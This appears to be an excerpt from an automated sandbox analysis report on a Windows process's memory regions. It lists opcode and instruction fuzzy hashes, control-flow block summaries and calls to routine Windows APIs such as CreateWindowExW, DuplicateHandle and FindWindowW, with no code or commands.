                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 84594f6f07445bf59bfc88162444101d5efbbeb83ac9f37f367fd952df57ea66
                                                                                • Instruction ID: 1d361648330eb46f4af7887ccff56a508b429774c7c6db286b2a50ee21ab60b1
                                                                                • Opcode Fuzzy Hash: 84594f6f07445bf59bfc88162444101d5efbbeb83ac9f37f367fd952df57ea66
                                                                                • Instruction Fuzzy Hash: 4291B474E00218CFDB18DFAAD884AADBBF2BF89300F15C069E459AB365DB345945DF50
                                                                                Memory Dump Source
                                                                                • Source File: 00000083.00000002.42908773760.0000000000160000.00000040.00000800.00020000.00000000.sdmp, Offset: 00160000, based on PE: false
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 11630ce93ad40090cd429b2ced3534b9120e7e1862d23913a089d28623c69e26
                                                                                • Instruction ID: 2426eb4078504c33284a573628fab81532166ba03ebb988c1ca64f3f51fe6b4e
                                                                                • Opcode Fuzzy Hash: 11630ce93ad40090cd429b2ced3534b9120e7e1862d23913a089d28623c69e26
                                                                                • Instruction Fuzzy Hash: F891D574E042188FEB18DFAAD884A9DBBF2BF89304F158069D409EB365DB349981CF50
                                                                                Memory Dump Source
                                                                                • Source File: 00000083.00000002.42908773760.0000000000160000.00000040.00000800.00020000.00000000.sdmp, Offset: 00160000, based on PE: false
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 8f36ed5c2cbaf881a2551c191a0de900c8856368e0f3e0e79acc427f3fe022d8
                                                                                • Instruction ID: 12fbab7fe9cb951bed490b6dd2c27ef976344e96bec2ab41a9babe7e73d00257
                                                                                • Opcode Fuzzy Hash: 8f36ed5c2cbaf881a2551c191a0de900c8856368e0f3e0e79acc427f3fe022d8
                                                                                • Instruction Fuzzy Hash: 7481C474E00218CFEB18DFAAD984A9DBBF2BF89300F15C069E859AB365DB345941DF50
                                                                                Memory Dump Source
                                                                                • Source File: 00000083.00000002.42908773760.0000000000160000.00000040.00000800.00020000.00000000.sdmp, Offset: 00160000, based on PE: false
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 55e720c0b17badf28e8aa2267e3944caf47fc2c02d96dc4405ce43ceb670321b
                                                                                • Instruction ID: 68076d6e42dd68dd071c577231931a9f596f6ce168ef30ffde24a6702b152505
                                                                                • Opcode Fuzzy Hash: 55e720c0b17badf28e8aa2267e3944caf47fc2c02d96dc4405ce43ceb670321b
                                                                                • Instruction Fuzzy Hash: 6581B574E01218DFDB18DFA9D884A9DBBF2BF89300F15C069D819AB365DB349941CF50
                                                                                Memory Dump Source
                                                                                • Source File: 00000083.00000002.42908773760.0000000000160000.00000040.00000800.00020000.00000000.sdmp, Offset: 00160000, based on PE: false
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 514288d9329a02bc191a78e4565cfe51e511845de52d9a34dcb4adb7ad372667
                                                                                • Instruction ID: 9ec24eae8957382dc31ca7694244dc57b595b32a5b48abf1a06e6f8c7bd1047f
                                                                                • Opcode Fuzzy Hash: 514288d9329a02bc191a78e4565cfe51e511845de52d9a34dcb4adb7ad372667
                                                                                • Instruction Fuzzy Hash: 4D81B374E00218DFEB18DFAAD884AADBBF2BF89300F159169E459AB365DB305941CF50
                                                                                Memory Dump Source
                                                                                • Source File: 00000083.00000002.42908773760.0000000000160000.00000040.00000800.00020000.00000000.sdmp, Offset: 00160000, based on PE: false
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: e43123e2d3fa442b0378595227824047848b0ed1d311c722f659eeea74a785e7
                                                                                • Instruction ID: 8079654de67cbecf069fdb0f1c56e1a8c03dd81729f290f33fd2967506e87eaf
                                                                                • Opcode Fuzzy Hash: e43123e2d3fa442b0378595227824047848b0ed1d311c722f659eeea74a785e7
                                                                                • Instruction Fuzzy Hash: D781B474E00218CFEB18DFA9D884AADBBF2BF89304F15C169E459AB365DB309941CF50
                                                                                Memory Dump Source
                                                                                • Source File: 00000083.00000002.42930382268.0000000037B90000.00000040.00000800.00020000.00000000.sdmp, Offset: 37B90000, based on PE: false
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 01caac7e2ecf509b3c59d6880d8d45dbb921cbd460dbfbd7ae90e9892ce30829
                                                                                • Instruction ID: 8a25647eddc689d0c12a967284569baff961879c781e56243983a0adba17e411
                                                                                • Opcode Fuzzy Hash: 01caac7e2ecf509b3c59d6880d8d45dbb921cbd460dbfbd7ae90e9892ce30829
                                                                                • Instruction Fuzzy Hash: 797194B4E016288FEB58CF6AC944B9DBBF2AF89300F14C1AAD40DA7255DB345A85CF51
                                                                                Memory Dump Source
                                                                                • Source File: 00000083.00000002.42930382268.0000000037B90000.00000040.00000800.00020000.00000000.sdmp, Offset: 37B90000, based on PE: false
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: b960b78a7bad9afc4817e86071a5efed4fb4a11558edf8f41d71f81a7742d255
                                                                                • Instruction ID: bcd7106f4a15e175a6c33fd539f1f17b40234f76e7920500627db73d0045a81b
                                                                                • Opcode Fuzzy Hash: b960b78a7bad9afc4817e86071a5efed4fb4a11558edf8f41d71f81a7742d255
                                                                                • Instruction Fuzzy Hash: 7D7196B5E016288FEB58CF6AC844B99BBF2AF89300F14C1AAD40DA7255DB345A85CF51
                                                                                Memory Dump Source
                                                                                • Source File: 00000083.00000002.42930382268.0000000037B90000.00000040.00000800.00020000.00000000.sdmp, Offset: 37B90000, based on PE: false
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 92d8e4759aa236d650db4dd5061e1fbbd5b2cb02e6d82a5cf9645fd568087400
                                                                                • Instruction ID: b9dfe60a6246d2a3d42c1ad9cf4ed3cc089814666ddf3887209d0e42ed868fef
                                                                                • Opcode Fuzzy Hash: 92d8e4759aa236d650db4dd5061e1fbbd5b2cb02e6d82a5cf9645fd568087400
                                                                                • Instruction Fuzzy Hash: A37193B5E016288FEB58CF6AC944BDDBBF2AF89300F14C1AAD40DA7255DB344A85CF50
                                                                                Memory Dump Source
                                                                                • Source File: 00000083.00000002.42908773760.0000000000160000.00000040.00000800.00020000.00000000.sdmp, Offset: 00160000, based on PE: false
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: de258a1ea3f7a05eb4e4079d62b2389d39bcde0bb4f1d584f1cc5c86d6ce6739
                                                                                • Instruction ID: 97c2c01712d6ed75ed6a238a82add6ee21ffd0ab55a651243dfaf9e22ba7c34a
                                                                                • Opcode Fuzzy Hash: de258a1ea3f7a05eb4e4079d62b2389d39bcde0bb4f1d584f1cc5c86d6ce6739
                                                                                • Instruction Fuzzy Hash: 9D518274E01208DFDB48DFAAD9849DDBBF2BF89300F249169E409AB365DB31A905DF50
                                                                                Memory Dump Source
                                                                                • Source File: 00000083.00000002.42930382268.0000000037B90000.00000040.00000800.00020000.00000000.sdmp, Offset: 37B90000, based on PE: false
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: d0f26eb4126290f3fe471e8dc33c652dd7d221443075d4a9a4a0d0283bb0eaa2
                                                                                • Instruction ID: cd07f61585bbf562ddf7ed4d288c369b42ae5458a56fb3db321901b152599d89
                                                                                • Opcode Fuzzy Hash: d0f26eb4126290f3fe471e8dc33c652dd7d221443075d4a9a4a0d0283bb0eaa2
                                                                                • Instruction Fuzzy Hash: 8041C3B0D016188FEB18DFAAD8447DEBBB2AF89304F14C169C418BB254DB755946CF64
                                                                                Memory Dump Source
                                                                                • Source File: 00000083.00000002.42930382268.0000000037B90000.00000040.00000800.00020000.00000000.sdmp, Offset: 37B90000, based on PE: false
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: f8c1f31de2b12a366a6e4931f2aa5cefe240dfe444c57343703f7c7c6b819a62
                                                                                • Instruction ID: 5a68a403094dcb8ac4f3ea71ecfe4d715dee6f31c48bdd61efa5d1064a21ab48
                                                                                • Opcode Fuzzy Hash: f8c1f31de2b12a366a6e4931f2aa5cefe240dfe444c57343703f7c7c6b819a62
                                                                                • Instruction Fuzzy Hash: 1C4169B1E016188BEB58CF6BCD457D9FAF3AFC9200F04C1BAC50CA6264DB740A868F51
                                                                                Memory Dump Source
                                                                                • Source File: 00000083.00000002.42930382268.0000000037B90000.00000040.00000800.00020000.00000000.sdmp, Offset: 37B90000, based on PE: false
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: c4e8cfe6501d20e57765ae7b2d8c13cb153ac84ed63c2ef08e44488c910c5c15
                                                                                • Instruction ID: e04962dea5b6752540c55c3c844b1c1eb3b6876c42427ee795a75f395caaf1df
                                                                                • Opcode Fuzzy Hash: c4e8cfe6501d20e57765ae7b2d8c13cb153ac84ed63c2ef08e44488c910c5c15
                                                                                • Instruction Fuzzy Hash: 684179B1D016189BEB58CF6BC9447CAFAF3AFC9200F14C1BAD50CA6254EB740A868F50
                                                                                Memory Dump Source
                                                                                • Source File: 00000083.00000002.42930382268.0000000037B90000.00000040.00000800.00020000.00000000.sdmp, Offset: 37B90000, based on PE: false
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 2443e926b03b0307427fff1ed6f107e17d0eae14962e5ed50d0271405e2ffac4
                                                                                • Instruction ID: 00d95d7b61e6593496189ebd234d90ac5f4a647ef48df2fc448f5b4f454fa6d3
                                                                                • Opcode Fuzzy Hash: 2443e926b03b0307427fff1ed6f107e17d0eae14962e5ed50d0271405e2ffac4
                                                                                • Instruction Fuzzy Hash: 424159B1D016189BEB58CF6BC9457DAFAF3AFC9210F14C1BAD50CA6264DB740A868F50
                                                                                Memory Dump Source
                                                                                • Source File: 00000083.00000002.42930382268.0000000037B90000.00000040.00000800.00020000.00000000.sdmp, Offset: 37B90000, based on PE: false
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: f7698cbf6a6176265fa3ba969ff63d85803574f51ad9026ce8e7b490aa3c9497
                                                                                • Instruction ID: 1ef178f078102eac9221a24bd8caafc3b419bff2ba3b3536f4b2015889b8af46
                                                                                • Opcode Fuzzy Hash: f7698cbf6a6176265fa3ba969ff63d85803574f51ad9026ce8e7b490aa3c9497
                                                                                • Instruction Fuzzy Hash: 414158B5D016188BEB58CF6BC9457CAFAF3AFC9300F14C1BAC50CA6265DB740A858F51
                                                                                Memory Dump Source
                                                                                • Source File: 00000083.00000002.42930382268.0000000037B90000.00000040.00000800.00020000.00000000.sdmp, Offset: 37B90000, based on PE: false
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 3374631869bc0f9598d68bfeba293790d3d34e15ea564ba8e944adc048532546
                                                                                • Instruction ID: 78fefe825b60e65cbe2e77fcd82e499193efb41d104056875a3461b9e3731d66
                                                                                • Opcode Fuzzy Hash: 3374631869bc0f9598d68bfeba293790d3d34e15ea564ba8e944adc048532546
                                                                                • Instruction Fuzzy Hash: EA4147B1E016188BEB58CF6BC9557D9FAF3AFC9310F14C1BAC50CA6265DB740A868F50
                                                                                Memory Dump Source
                                                                                • Source File: 00000083.00000002.42930382268.0000000037B90000.00000040.00000800.00020000.00000000.sdmp, Offset: 37B90000, based on PE: false
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 54f4636abe563930a25eae3293a6fd2c70c62a4c7dd65157877fd1ff0b8a7812
                                                                                • Instruction ID: 253f451ba9956a23933afc7d6ff3fc7ec20ff4466f647679ffc71448815bb9b9
                                                                                • Opcode Fuzzy Hash: 54f4636abe563930a25eae3293a6fd2c70c62a4c7dd65157877fd1ff0b8a7812
                                                                                • Instruction Fuzzy Hash: 6B41B274D01208CBEB58DFAAD5407DEBBF2AF89300F209139D418BB255EB355946CF54

                                                                                Control-flow Graph

                                                                                APIs
                                                                                • GetCurrentProcess.KERNEL32 ref: 37DE6556
                                                                                • GetCurrentThread.KERNEL32 ref: 37DE6593
                                                                                • GetCurrentProcess.KERNEL32 ref: 37DE65D0
                                                                                • GetCurrentThreadId.KERNEL32 ref: 37DE6629
                                                                                Memory Dump Source
                                                                                • Source File: 00000083.00000002.42930769058.0000000037DE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 37DE0000, based on PE: false
                                                                                Similarity
                                                                                • API ID: Current$ProcessThread
                                                                                • String ID:
                                                                                • API String ID: 2063062207-0
                                                                                • Opcode ID: 5a3a3d238e8c93158033be7c270111c6bd76423ae87adf8dfb9813991b77407a
                                                                                • Instruction ID: bba8e94ad4483e5d7a34bc591c0ad81ed7f9ece36a342c535d28c239a68b865d
                                                                                • Opcode Fuzzy Hash: 5a3a3d238e8c93158033be7c270111c6bd76423ae87adf8dfb9813991b77407a
                                                                                • Instruction Fuzzy Hash: E35167B0900789DFDB01CFAAC884B9EBBF1EF48314F24845ED018A7392D774A944CB66

                                                                                Control-flow Graph

                                                                                APIs
                                                                                • GetCurrentProcess.KERNEL32 ref: 37DE6556
                                                                                • GetCurrentThread.KERNEL32 ref: 37DE6593
                                                                                • GetCurrentProcess.KERNEL32 ref: 37DE65D0
                                                                                • GetCurrentThreadId.KERNEL32 ref: 37DE6629
                                                                                Memory Dump Source
                                                                                • Source File: 00000083.00000002.42930769058.0000000037DE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 37DE0000, based on PE: false
                                                                                Similarity
                                                                                • API ID: Current$ProcessThread
                                                                                • String ID:
                                                                                • API String ID: 2063062207-0
                                                                                • Opcode ID: fa3ba59697d2db266748a99db43091595a6c82d169275b27a4a1a85ebcbb8734
                                                                                • Instruction ID: ca93020b495f78e8aeb4f1b300750e3db49df7f81ded65acc4f3b7125a26f2de
                                                                                • Opcode Fuzzy Hash: fa3ba59697d2db266748a99db43091595a6c82d169275b27a4a1a85ebcbb8734
                                                                                • Instruction Fuzzy Hash: E75156B0900649DFDB00DFAAD884B9EBBF1EF88314F20845ED019A7351D734A944CF65

                                                                                 Control-flow Graph (rendered graph omitted; basic blocks 37dd09ed-37dd0b69, CreateWindowExW called in block 37dd0a7b-37dd0b1a)
                                                                                APIs
                                                                                • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 37DD0B0A
                                                                                Memory Dump Source
                                                                                • Source File: 00000083.00000002.42930737080.0000000037DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 37DD0000, based on PE: false
                                                                                Similarity
                                                                                • API ID: CreateWindow
                                                                                • String ID:
                                                                                • API String ID: 716092398-0
                                                                                • Opcode ID: ec8fe377c94619efb47dc66306e5fd9eee4d0b184c008e664130821c046ddd20
                                                                                • Instruction ID: 36205d5c5badcfe38dd58ac51bf5120bfd7d6b1daa0d220a3c9478c8eca92f0f
                                                                                • Opcode Fuzzy Hash: ec8fe377c94619efb47dc66306e5fd9eee4d0b184c008e664130821c046ddd20
                                                                                • Instruction Fuzzy Hash: 1651B0B1D00209AFDB14CF9AD880ADDFBB5FF88354F60812AE418AB250D774A985CF91

                                                                                 Control-flow Graph (rendered graph omitted; basic blocks 37dd09f8-37dd0b69, CreateWindowExW called in block 37dd0a7b-37dd0b1a)
                                                                                APIs
                                                                                • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 37DD0B0A
                                                                                Memory Dump Source
                                                                                • Source File: 00000083.00000002.42930737080.0000000037DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 37DD0000, based on PE: false
                                                                                Similarity
                                                                                • API ID: CreateWindow
                                                                                • String ID:
                                                                                • API String ID: 716092398-0
                                                                                • Opcode ID: 9d4c437ada2a875e7e8b3e58f7a2e6e23ab67f76ccd0470cd08e37e9cd0c3362
                                                                                • Instruction ID: 1db58fd4d92ca452faa041c9eb429a5cc2bf1c4eea0807bdb05d11e08aae9ea3
                                                                                • Opcode Fuzzy Hash: 9d4c437ada2a875e7e8b3e58f7a2e6e23ab67f76ccd0470cd08e37e9cd0c3362
                                                                                • Instruction Fuzzy Hash: 6541BEB5D00309DFDB14CF9AD880ADEFBB5BF88314F64812AE418AB250D774A985CF91

                                                                                 Control-flow Graph (rendered graph omitted; basic blocks 37de66a7-37de67da, call to 37de60b4 in block 37de66b6-37de66e1, DuplicateHandle called in block 37de6727-37de67b4)
                                                                                APIs
                                                                                • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 37DE67A7
                                                                                Memory Dump Source
                                                                                • Source File: 00000083.00000002.42930769058.0000000037DE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 37DE0000, based on PE: false
                                                                                Similarity
                                                                                • API ID: DuplicateHandle
                                                                                • String ID:
                                                                                • API String ID: 3793708945-0
                                                                                • Opcode ID: 38d81eab948f81b5d76a14041a6bc1bbf785f8e5a8697a0e841578644b64041b
                                                                                • Instruction ID: 55813264cc1be7225d73c87dc88b4b72fbcec44770ecec3c3a7fa3fb173c9ab2
                                                                                • Opcode Fuzzy Hash: 38d81eab948f81b5d76a14041a6bc1bbf785f8e5a8697a0e841578644b64041b
                                                                                • Instruction Fuzzy Hash: DA416776900249AFCB02CF99D840ADEBFF5FF49310F14806AE944A7311C335AA10DFA1

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 790 37dd3140-37dd317c 791 37dd322c-37dd324c 790->791 792 37dd3182-37dd3187 790->792 798 37dd324f-37dd325c 791->798 793 37dd3189-37dd31c0 792->793 794 37dd31da-37dd3212 CallWindowProcW 792->794 801 37dd31c9-37dd31d8 793->801 802 37dd31c2-37dd31c8 793->802 796 37dd321b-37dd322a 794->796 797 37dd3214-37dd321a 794->797 796->798 797->796 801->798 802->801
                                                                                APIs
                                                                                • CallWindowProcW.USER32(?,?,?,?,?), ref: 37DD3201
                                                                                Memory Dump Source
                                                                                • Source File: 00000083.00000002.42930737080.0000000037DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 37DD0000, based on PE: false
                                                                                Similarity
                                                                                • API ID: CallProcWindow
                                                                                • String ID:
                                                                                • API String ID: 2714655100-0
                                                                                • Opcode ID: 83d2fe6614a3fefcc0f77595d54c5492e3d18d27f387c1e6ba94316846930425
                                                                                • Instruction ID: 1b545caeee6a45bc93bc29b58bbe3a661ee5039cc3afebd06da5e0a90bc19062
                                                                                • Opcode Fuzzy Hash: 83d2fe6614a3fefcc0f77595d54c5492e3d18d27f387c1e6ba94316846930425
                                                                                • Instruction Fuzzy Hash: D34114B9A00709DFDB04CF99C884B9AFBF5FF98314F258859D418AB721D774A845CBA0

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 805 37de6719-37de67b4 DuplicateHandle 806 37de67bd-37de67da 805->806 807 37de67b6-37de67bc 805->807 807->806
                                                                                APIs
                                                                                • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 37DE67A7
                                                                                Memory Dump Source
                                                                                • Source File: 00000083.00000002.42930769058.0000000037DE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 37DE0000, based on PE: false
                                                                                Similarity
                                                                                • API ID: DuplicateHandle
                                                                                • String ID:
                                                                                • API String ID: 3793708945-0
                                                                                • Opcode ID: d7ffe3dfb8013f55584b56959abd3d05418e33fcdede1d5df0163d7bd324e340
                                                                                • Instruction ID: b89379c68740961bce9fb603b42ecb81d133f52dd5fe0f74c3c2967b63357742
                                                                                • Opcode Fuzzy Hash: d7ffe3dfb8013f55584b56959abd3d05418e33fcdede1d5df0163d7bd324e340
                                                                                • Instruction Fuzzy Hash: 4921E3B5900648AFDB10CFAAD980ADEFBF4FF48320F14842AE954A7350D374A954CFA5

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 810 37de6720-37de67b4 DuplicateHandle 811 37de67bd-37de67da 810->811 812 37de67b6-37de67bc 810->812 812->811
                                                                                APIs
                                                                                • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 37DE67A7
                                                                                Memory Dump Source
                                                                                • Source File: 00000083.00000002.42930769058.0000000037DE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 37DE0000, based on PE: false
                                                                                Similarity
                                                                                • API ID: DuplicateHandle
                                                                                • String ID:
                                                                                • API String ID: 3793708945-0
                                                                                • Opcode ID: 94e4d2bd0f43d1ddd84b0f4c4f54808031b528073d5a5bc32ca751b62b297184
                                                                                • Instruction ID: d4712658e698a299ab09f456d78085c1f641cb1d5d06a8ca1b59fab2e62bc67a
                                                                                • Opcode Fuzzy Hash: 94e4d2bd0f43d1ddd84b0f4c4f54808031b528073d5a5bc32ca751b62b297184
                                                                                • Instruction Fuzzy Hash: 9A21E4B5900248AFDB10CFAAD880ADEFBF8EF48310F14841AE954A7350D374A954CFA5

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 815 37debcf8-37debd43 816 37debd4b-37debd4f 815->816 817 37debd45-37debd48 815->817 818 37debd57-37debd83 FindWindowW 816->818 819 37debd51-37debd54 816->819 817->816 820 37debd8c-37debda0 818->820 821 37debd85-37debd8b 818->821 819->818 821->820
                                                                                APIs
                                                                                • FindWindowW.USER32(00000000,00000000), ref: 37DEBD76
                                                                                Memory Dump Source
                                                                                • Source File: 00000083.00000002.42930769058.0000000037DE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 37DE0000, based on PE: false
                                                                                Similarity
                                                                                • API ID: FindWindow
                                                                                • String ID:
                                                                                • API String ID: 134000473-0
                                                                                • Opcode ID: 7e555fcfa6482c53c1a07c8a1b56c43a01f8563dc1df2848143e6deba56d8387
                                                                                • Instruction ID: 0098d0421998dd3052747578c188ffb7ae423c1edeaee2311d21293d199f254c
                                                                                • Opcode Fuzzy Hash: 7e555fcfa6482c53c1a07c8a1b56c43a01f8563dc1df2848143e6deba56d8387
                                                                                • Instruction Fuzzy Hash: C52110B98016498FCB00CF9AD884ADEFBF4BF49320F24852ED41AA7600D374A545CFA1

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 823 37dea624-37debd43 825 37debd4b-37debd4f 823->825 826 37debd45-37debd48 823->826 827 37debd57-37debd83 FindWindowW 825->827 828 37debd51-37debd54 825->828 826->825 829 37debd8c-37debda0 827->829 830 37debd85-37debd8b 827->830 828->827 830->829
                                                                                APIs
                                                                                • FindWindowW.USER32(00000000,00000000), ref: 37DEBD76
                                                                                Memory Dump Source
                                                                                • Source File: 00000083.00000002.42930769058.0000000037DE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 37DE0000, based on PE: false
                                                                                Similarity
                                                                                • API ID: FindWindow
                                                                                • String ID:
                                                                                • API String ID: 134000473-0
                                                                                • Opcode ID: 98be72e8e3e24bfcdf0314b09481ab07cb90f30fa4ce4a141399adb5a465045e
                                                                                • Instruction ID: 8e831ac679c8d929b5cc3d89cb736c13a729748afd31469285f0fba85198b88f
                                                                                • Opcode Fuzzy Hash: 98be72e8e3e24bfcdf0314b09481ab07cb90f30fa4ce4a141399adb5a465045e
                                                                                • Instruction Fuzzy Hash: 512133B58017099FCB00CF9AC880ADEFBF8FF49220F14852ED419AB600C374A544CFA1
                                                                                APIs
                                                                                • OleInitialize.OLE32(00000000), ref: 37DD56CD
                                                                                Memory Dump Source
                                                                                • Source File: 00000083.00000002.42930737080.0000000037DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 37DD0000, based on PE: false
                                                                                Similarity
                                                                                • API ID: Initialize
                                                                                • String ID:
                                                                                • API String ID: 2538663250-0
                                                                                • Opcode ID: 10607068ec74b8bb2e60140ec9dc0378d1bd41400e4044450902e435f91f60b6
                                                                                • Instruction ID: d898acac00e295ff626df0475ee7754f9017fe3d2e4e103d7cacb8f7df6f2d1a
                                                                                • Opcode Fuzzy Hash: 10607068ec74b8bb2e60140ec9dc0378d1bd41400e4044450902e435f91f60b6
                                                                                • Instruction Fuzzy Hash: 3B1103B59007488FCB10DFAAD884BDEFFF4EF49220F24855AD519A7241D374A944CBA5
                                                                                APIs
                                                                                • OleInitialize.OLE32(00000000), ref: 37DD56CD
                                                                                Memory Dump Source
                                                                                • Source File: 00000083.00000002.42930737080.0000000037DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 37DD0000, based on PE: false
                                                                                Similarity
                                                                                • API ID: Initialize
                                                                                • String ID:
                                                                                • API String ID: 2538663250-0
                                                                                • Opcode ID: 80e32a0e930cf6d7feef06fff12008027e203cf165006d2b60e05a59188935eb
                                                                                • Instruction ID: 8dfa6058f1f3a1c9fd1d82a550a53838234f6fdd2d8ac2c17969f619f91102a4
                                                                                • Opcode Fuzzy Hash: 80e32a0e930cf6d7feef06fff12008027e203cf165006d2b60e05a59188935eb
                                                                                • Instruction Fuzzy Hash: 291112B59007489FDB10DFAAD884B9EFBF4EF48320F20841AD519A7741D378A944CFA5
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000083.00000002.42908773760.0000000000160000.00000040.00000800.00020000.00000000.sdmp, Offset: 00160000, based on PE: false
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: 4
                                                                                • API String ID: 0-4088798008
                                                                                • Opcode ID: ca827a4ad411473af9d50ef1a1f26997d35fc0c4701b04b4abb0efcbf1f772b0
                                                                                • Instruction ID: 9082e4a376307596df557429471513c884d83e3515550c24c42daf87ee637b85
                                                                                • Opcode Fuzzy Hash: ca827a4ad411473af9d50ef1a1f26997d35fc0c4701b04b4abb0efcbf1f772b0
                                                                                • Instruction Fuzzy Hash: 82113035B00208ABDB149F65DC48A9EBBFABF8D711F54806AE902A7350DB71AD10CB90
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000083.00000002.42908773760.0000000000160000.00000040.00000800.00020000.00000000.sdmp, Offset: 00160000, based on PE: false
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: T
                                                                                • API String ID: 0-2145084337
                                                                                • Opcode ID: 2299b8df7932fe3f5ac9fac5778054a39966f3cd9d616ce655d5cde5fbe64c98
                                                                                • Instruction ID: df3507456ee53b52981c866b2e584a2308aced9406ff5dff2f6d92907ce024e6
                                                                                • Opcode Fuzzy Hash: 2299b8df7932fe3f5ac9fac5778054a39966f3cd9d616ce655d5cde5fbe64c98
                                                                                • Instruction Fuzzy Hash: BE21C274C046098FCB41EFB8D8455EDBFF1BF49301F50516AD805B7264EB345A99CBA1
                                                                                Memory Dump Source
                                                                                • Source File: 00000083.00000002.42908773760.0000000000160000.00000040.00000800.00020000.00000000.sdmp, Offset: 00160000, based on PE: false
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: b5703a74738362089ab5e067bf31fe84f12eda44c380c61f817a36b80ecb4711
                                                                                • Instruction ID: 944ab86367223e84c0bede78e87cd27c367c370700da0129124f143acf1a94a6
                                                                                • Opcode Fuzzy Hash: b5703a74738362089ab5e067bf31fe84f12eda44c380c61f817a36b80ecb4711
                                                                                • Instruction Fuzzy Hash: C822D57491025ACFCB54DFA4EC94A9DBBB1BF89705F1086A5D409AB360DF306E86CF81
                                                                                Memory Dump Source
                                                                                • Source File: 00000083.00000002.42908773760.0000000000160000.00000040.00000800.00020000.00000000.sdmp, Offset: 00160000, based on PE: false
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 8c6872014813c17a9f83b5ba7ecb4ad09c7a56746167ad44f14d6704b2423919
                                                                                • Instruction ID: eb208235bf8887232c7c79b74f3c9ab208d64ca8d83e9d37a453f497693838aa
                                                                                • Opcode Fuzzy Hash: 8c6872014813c17a9f83b5ba7ecb4ad09c7a56746167ad44f14d6704b2423919
                                                                                • Instruction Fuzzy Hash: C322C574A1025ACFDB54DFA4EC94A9DB7B1BF89705F1086A5D409AB360DF306E86CF80
                                                                                Memory Dump Source
                                                                                • Source File: 00000083.00000002.42908773760.0000000000160000.00000040.00000800.00020000.00000000.sdmp, Offset: 00160000, based on PE: false
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: bf7129a7f68e286f80c326c8569df341ce33e5c0bfea31d1b019e36c4e013ac9
                                                                                • Instruction ID: 43b3b03470319004c8c1a22ca317bcc217144ef818ba2ac88e068470717e0418
                                                                                • Opcode Fuzzy Hash: bf7129a7f68e286f80c326c8569df341ce33e5c0bfea31d1b019e36c4e013ac9
                                                                                • Instruction Fuzzy Hash: 8ED16A30A04209CFCB24DFA8D994AADBBF2FF89318F158599E8059B2A1D730ED51CB50
                                                                                Memory Dump Source
                                                                                • Source File: 00000083.00000002.42908773760.0000000000160000.00000040.00000800.00020000.00000000.sdmp, Offset: 00160000, based on PE: false
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 523120558a78a9e3ac70ed4a4d3254d2fb4b1e8259c3829e8f1fa348e1c31896
                                                                                • Instruction ID: 796d38ed6f09ef3cb0b364abbafa5e47b888fb31c30eab482919628100768b37
                                                                                • Opcode Fuzzy Hash: 523120558a78a9e3ac70ed4a4d3254d2fb4b1e8259c3829e8f1fa348e1c31896
